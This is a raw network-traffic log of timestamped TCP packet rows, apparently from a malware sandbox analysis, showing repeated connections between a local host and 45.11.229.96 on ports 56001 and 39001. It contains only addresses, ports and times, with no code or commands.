Sep 19, 2024 02:25:47.836781979 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.836816072 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.836822987 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.836883068 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.836939096 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.842093945 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.842123985 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.842158079 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.842194080 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.842201948 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.842252970 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.842302084 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.842334032 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.842370033 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.842382908 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.842431068 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.842463017 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.842508078 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.842540026 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.842542887 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.842586040 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.842617989 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.842621088 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.842648983 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.842683077 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.842684031 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.842731953 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.842760086 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.842781067 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.842817068 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.842848063 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.842879057 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.842910051 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.842912912 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.842941046 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.842972994 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.842978001 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.843020916 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.843029022 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.843053102 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.843100071 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.843131065 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.843178034 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.843192101 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.843209028 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.843209982 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.843256950 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.843288898 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.843291044 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.843334913 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.843369961 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.843420982 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.843434095 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.843451977 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.843452930 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.843485117 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.843517065 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.843519926 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.843564987 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.843596935 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.843626976 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.843630075 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.843674898 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.843678951 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.843707085 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.843738079 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.843767881 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.843770981 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.843816996 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.843847990 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.843852043 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.843879938 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.843914986 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.843934059 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.843971968 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.843981981 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.844012976 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.844044924 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.844079018 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.844095945 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.844129086 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.844134092 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.844161034 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.844192028 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.844204903 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.844225883 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.844257116 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.844286919 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.844290972 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.844319105 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.844320059 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.844351053 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.844383001 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.844384909 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.844413996 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.844445944 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.844453096 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.844476938 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.844508886 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.844511986 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.844540119 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.844573021 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.844574928 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.844603062 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.844635010 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.844639063 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.844666004 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.844710112 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.844711065 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.844738007 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.844769001 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.844800949 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.844803095 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.844832897 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.844840050 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.844863892 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.844894886 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.844899893 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.844928980 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.844959021 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.844961882 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.844991922 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.845021963 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.845026016 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.845056057 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.845087051 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.845089912 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.845123053 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.845158100 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:48.047482967 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:48.304346085 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:48.309695959 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:48.309860945 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:48.311100006 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:48.315983057 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:48.316135883 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:48.320924044 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:48.401453972 CEST	39001	49755	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:48.402049065 CEST	49755	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:48.402220964 CEST	49755	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:48.407043934 CEST	39001	49755	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:48.516892910 CEST	49757	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:48.522013903 CEST	39001	49757	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:48.522799015 CEST	49757	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:48.538104057 CEST	49757	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:48.542984962 CEST	39001	49757	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:48.543158054 CEST	49757	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:48.548018932 CEST	39001	49757	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:48.938076973 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:48.938663006 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:48.943572998 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:48.987396955 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:48.992628098 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:48.992749929 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:48.997742891 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:49.143913031 CEST	39001	49757	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:49.143980980 CEST	49757	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:49.144489050 CEST	49757	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:49.149292946 CEST	39001	49757	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:49.251720905 CEST	49758	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:49.256664991 CEST	39001	49758	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:49.256761074 CEST	49758	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:49.290116072 CEST	49758	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:49.294945002 CEST	39001	49758	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:49.295101881 CEST	49758	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:49.299899101 CEST	39001	49758	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:49.542588949 CEST	80	49730	95.179.241.203	192.168.2.6
Sep 19, 2024 02:25:49.703576088 CEST	49730	80	192.168.2.6	95.179.241.203
Sep 19, 2024 02:25:49.874203920 CEST	39001	49758	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:49.874284983 CEST	49758	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:49.874468088 CEST	49758	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:49.879607916 CEST	39001	49758	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:49.985526085 CEST	49759	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:49.990458012 CEST	39001	49759	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:49.990530968 CEST	49759	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:50.002197981 CEST	49759	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:50.007039070 CEST	39001	49759	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:50.007106066 CEST	49759	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:50.011971951 CEST	39001	49759	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:50.618136883 CEST	39001	49759	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:50.621016979 CEST	49759	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:50.641671896 CEST	49759	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:50.646850109 CEST	39001	49759	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:50.818289042 CEST	49760	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:50.825694084 CEST	39001	49760	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:50.829227924 CEST	49760	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:51.251204014 CEST	49760	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:51.256094933 CEST	39001	49760	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:51.256182909 CEST	49760	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:51.261010885 CEST	39001	49760	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:51.445755005 CEST	39001	49760	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:51.445949078 CEST	49760	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:51.446064949 CEST	49760	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:51.451039076 CEST	39001	49760	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:51.563977957 CEST	49762	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:51.568973064 CEST	39001	49762	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:51.569056988 CEST	49762	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:51.581804991 CEST	49762	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:51.586643934 CEST	39001	49762	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:51.586745024 CEST	49762	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:51.591528893 CEST	39001	49762	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.211046934 CEST	39001	49762	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.211114883 CEST	49762	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.211215019 CEST	49762	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.215964079 CEST	39001	49762	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.321396112 CEST	49763	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.326365948 CEST	39001	49763	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.326442957 CEST	49763	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.339730024 CEST	49763	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.344631910 CEST	39001	49763	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.344953060 CEST	49763	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.345715046 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.349725962 CEST	39001	49763	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.365777969 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.365797043 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.365814924 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.365830898 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.365849018 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.365865946 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.365884066 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.365902901 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.366015911 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.366015911 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.366017103 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.366017103 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.370919943 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.370986938 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.370995998 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.371015072 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.371035099 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.371068954 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.371320009 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.371378899 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.371414900 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.425581932 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.454312086 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.454339981 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.454356909 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.454400063 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.454416990 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.454545021 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.454545975 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.454729080 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.454746962 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.454775095 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.454792023 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.454802990 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.454811096 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.454829931 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.454849958 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.455601931 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.455621004 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.455638885 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.455682039 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.455682993 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.455702066 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.455748081 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.456569910 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.456589937 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.456607103 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.456624985 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.456629992 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.456645012 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.456650972 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.456739902 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.457398891 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.457664967 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.457714081 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.542707920 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.542737961 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.542754889 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.542862892 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.542879105 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.542910099 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.542910099 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.542993069 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.543029070 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.543045998 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.543054104 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.543102980 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.543301105 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.543350935 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.543370008 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.543401003 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.543421984 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.543438911 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.543457031 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.543483973 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.543514967 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.544168949 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.544188976 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.544207096 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.544224024 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.544241905 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.544250965 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.544260025 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.544275045 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.544280052 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.544332981 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.545109034 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.545128107 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.545145988 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.545156002 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.545165062 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.545183897 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.545202017 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.545208931 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.545219898 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.545231104 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.545262098 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.545850992 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.545880079 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.545897007 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.545950890 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.545988083 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.546006918 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.546034098 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.631292105 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.631310940 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.631330013 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.631369114 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.631402016 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.631418943 CEST	49756	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:52.631422997 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.631449938 CEST	56001	49756	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:52.631459951 CEST	49756	56001	192.168.2.6	45.11.229.96
